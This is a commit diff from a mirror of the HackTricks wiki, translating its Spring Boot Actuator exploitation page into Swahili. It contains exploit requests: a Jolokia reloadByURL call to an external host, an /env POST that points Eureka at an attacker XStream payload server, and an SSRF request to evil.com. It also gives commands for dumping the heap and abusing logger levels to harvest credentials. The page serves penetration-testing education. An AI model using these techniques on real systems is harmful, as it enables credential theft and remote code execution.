mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['', 'src/linux-hardening/privilege-escalation/README.md', 's
This commit is contained in:
Translator
parent
bf8ba21918
commit
0ac79808a3
File diff suppressed because it is too large
Load Diff
@ -6,30 +6,30 @@
|
||||
|
||||
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
|
||||
**Kutoka** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
|
||||
|
||||
## Exploiting Spring Boot Actuators
|
||||
## Kutumia Spring Boot Actuators
|
||||
|
||||
**Check the original post from** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
|
||||
**Tazama chapisho la asili kutoka** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
|
||||
|
||||
### **Key Points:**
|
||||
### **Mambo Muhimu:**
|
||||
|
||||
- Spring Boot Actuators hujaza mwisho kama `/health`, `/trace`, `/beans`, `/env`, n.k. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 kuendelea, tu `/health` na `/info` hazina hatari kwa default, lakini waendelezaji mara nyingi huondoa usalama huu.
|
||||
- Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
|
||||
- Spring Boot Actuators hujisajili endpoints kama `/health`, `/trace`, `/beans`, `/env`, n.k. Katika matoleo 1 mpaka 1.4, endpoints hizi zinapatikana bila authentication. Kuanzia toleo 1.5 na baadaye, `/health` na `/info` zinaonekana kukosa usiri kwa default, lakini mara nyingi developers huzimia usalama huu.
|
||||
- Endpoint fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
|
||||
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, na `/heapdump`.
|
||||
- Katika Spring Boot 1.x, actuators hujaza chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi `/actuator/`.
|
||||
- Katika Spring Boot 1.x, actuators hujisajili chini ya root URL, wakati kwenye 2.x, ziko chini ya base path ya `/actuator/`.
|
||||
|
||||
### **Exploitation Techniques:**
|
||||
### **Mbinu za Kuchukua Fursa:**
|
||||
|
||||
1. **Remote Code Execution via '/jolokia'**:
|
||||
- Mwisho wa actuator `/jolokia` unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.
|
||||
- Kitendo cha `reloadByURL` kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Utekelezaji wa Kode ya K remote kupitia mipangilio ya XML iliyoundwa.
|
||||
- Mfano wa URL ya shambulio: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
|
||||
- Endpoint ya `/jolokia` actuator inaonyesha maktaba ya Jolokia, ambayo inaruhusu upatikanaji wa MBeans kupitia HTTP.
|
||||
- Kitendo cha `reloadByURL` kinaweza kutumika kupakia upya usanidi wa logging kutoka URL ya nje, ambayo inaweza kusababisha blind XXE au Remote Code Execution kupitia usanidi wa XML uliotengenezwa.
|
||||
- Mfano wa exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
|
||||
2. **Config Modification via '/env'**:
|
||||
|
||||
- Ikiwa Maktaba za Spring Cloud zipo, mwisho wa `/env` unaruhusu mabadiliko ya mali za mazingira.
|
||||
- Mali zinaweza kubadilishwa ili kutumia udhaifu, kama vile udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.
|
||||
- Mfano wa ombi la POST la shambulio:
|
||||
- Ikiwa Spring Cloud Libraries zipo, endpoint ya `/env` inaruhusu urekebishaji wa properties za mazingira.
|
||||
- Properties zinaweza kudhibitiwa ili kuchukua fursa za udhaifu, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
|
||||
- Mfano wa POST request ya exploit:
|
||||
|
||||
```
|
||||
POST /env HTTP/1.1
|
||||
@ -41,24 +41,98 @@ eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
|
||||
```
|
||||
|
||||
3. **Other Useful Settings**:
|
||||
- Mali kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kubadilishwa kwa shambulio mbalimbali, kama vile SQL injection au kubadilisha nyuzi za muunganisho wa database.
|
||||
- Properties kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kudhibitiwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
|
||||
|
||||
### **Additional Information:**
|
||||
### **Taarifa Zaidi:**
|
||||
|
||||
- Orodha kamili ya actuators za default inaweza kupatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
|
||||
- Mwisho wa `/env` katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki kuwa sawa.
|
||||
- Orodha kamili ya default actuators inaweza kupatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
|
||||
- Endpoint ya `/env` katika Spring Boot 2.x inatumia JSON format kwa ajili ya mabadiliko ya property, lakini kanuni ya jumla inabaki ile ile.
|
||||
|
||||
### **Related Topics:**
|
||||
### **Mada Zinazohusiana:**
|
||||
|
||||
1. **Env + H2 RCE**:
|
||||
- Maelezo kuhusu kutumia mchanganyiko wa mwisho wa `/env` na database ya H2 yanaweza kupatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
||||
- Maelezo juu ya kuchukua fursa ya mchanganyiko wa endpoint ya `/env` na database ya H2 yanapatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
||||
|
||||
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
|
||||
- Usimamizi wa mfumo wa Spring wa vigezo vya matrix (`;`) katika majina ya njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF).
|
||||
- Mfano wa ombi la shambulio:
|
||||
- Uendeshaji wa framework ya Spring wa matrix parameters (`;`) katika pathnames za HTTP unaweza kutumiwa kwa Server-Side Request Forgery (SSRF).
|
||||
- Mfano wa ombi la exploit:
|
||||
```http
|
||||
GET ;@evil.com/url HTTP/1.1
|
||||
Host: target.com
|
||||
Connection: close
|
||||
```
|
||||
## Kuchimba siri za HeapDump (credentials, tokens, internal URLs)
|
||||
|
||||
Ikiwa `/actuator/heapdump` inapatikana, kawaida unaweza kupata snapshot kamili ya heap ya JVM ambayo mara nyingi ina siri hai (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
|
||||
|
||||
- Pakua na uchambuzi wa haraka:
|
||||
```bash
|
||||
wget http://target/actuator/heapdump -O heapdump
|
||||
# Quick wins: look for HTTP auth and JDBC
|
||||
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
|
||||
# Decode any Basic credentials you find
|
||||
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
|
||||
```
|
||||
|
||||
- Uchambuzi wa undani zaidi kwa kutumia VisualVM na OQL:
|
||||
- Fungua heapdump katika VisualVM, chunguza instances za `java.lang.String` au endesha OQL kutafuta siri:
|
||||
```
|
||||
select s.toString()
|
||||
from java.lang.String s
|
||||
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
|
||||
```
|
||||
|
||||
- Uondoaji wa moja kwa moja kwa JDumpSpider:
|
||||
```bash
|
||||
java -jar JDumpSpider-*.jar heapdump
|
||||
```
|
||||
Matokeo yenye thamani ya juu kwa kawaida:
|
||||
- Spring `DataSourceProperties` / `HikariDataSource` objects exposing `url`, `username`, `password`.
|
||||
- `OriginTrackedMapPropertySource` entries revealing `management.endpoints.web.exposure.include`, service ports, and embedded Basic-Auth in URLs (e.g., Eureka `defaultZone`).
|
||||
- Plain HTTP request/response fragments including `Authorization: Basic ...` captured in memory.
|
||||
|
||||
Vidokezo:
|
||||
- Tumia wordlist inayolenga Spring ili kugundua actuator endpoints kwa haraka (mfano, SecLists spring-boot.txt) na kila mara angalia kama `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, na `/actuator/configprops` pia zinapatikana.
|
||||
- Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), kwa hiyo jaribu kwa upana.
|
||||
|
||||
## Kutumia vibaya Actuator loggers/logging ili capture credentials
|
||||
|
||||
Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` inapatikana, unaweza kuinua kwa nguvu viwango vya log hadi DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Imeunganishwa na logs zinazoweza kusomwa (kupitia `/actuator/logfile` au njia za log zinazojulikana), hii inaweza leak credentials zilizowasilishwa wakati wa mchakato wa login (mfano, Basic-Auth headers au vigezo vya fomu).
|
||||
|
||||
- Orodhesha na ongeza viwango vya log vya nyeti:
|
||||
```bash
|
||||
# List available loggers
|
||||
curl -s http://target/actuator/loggers | jq .
|
||||
|
||||
# Enable very verbose logs for security/web stacks (adjust as needed)
|
||||
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
|
||||
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
|
||||
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
|
||||
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
|
||||
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
|
||||
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
|
||||
```
|
||||
|
||||
- Tafuta mahali logs zinaandikwa na kusanya:
|
||||
```bash
|
||||
# If exposed, read from Actuator directly
|
||||
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
|
||||
|
||||
# Otherwise, query env/config to locate file path
|
||||
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
|
||||
```
|
||||
|
||||
- Sababisha trafiki ya login/authentication na changanua log kwa creds. Katika mipangilio ya microservice yenye gateway mbele ya auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi huonyesha headers na bodies za fomu. Baadhi ya mazingira hata hutengeneza trafiki ya login ya synthetic kwa vipindi, na kufanya ukusanyaji kuwa rahisi mara logging inapokuwa verbose.
|
||||
|
||||
Vidokezo:
|
||||
- Rejesha viwango vya log ukimaliza: `POST /actuator/loggers/<logger>` na `{ "configuredLevel": null }`.
|
||||
- Ikiwa `/actuator/httpexchanges` inapatikana, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha sensitive headers.
|
||||
|
||||
## Marejeleo
|
||||
|
||||
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
|
||||
- [VisualVM](https://visualvm.github.io/)
|
||||
- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
|
||||
- [0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user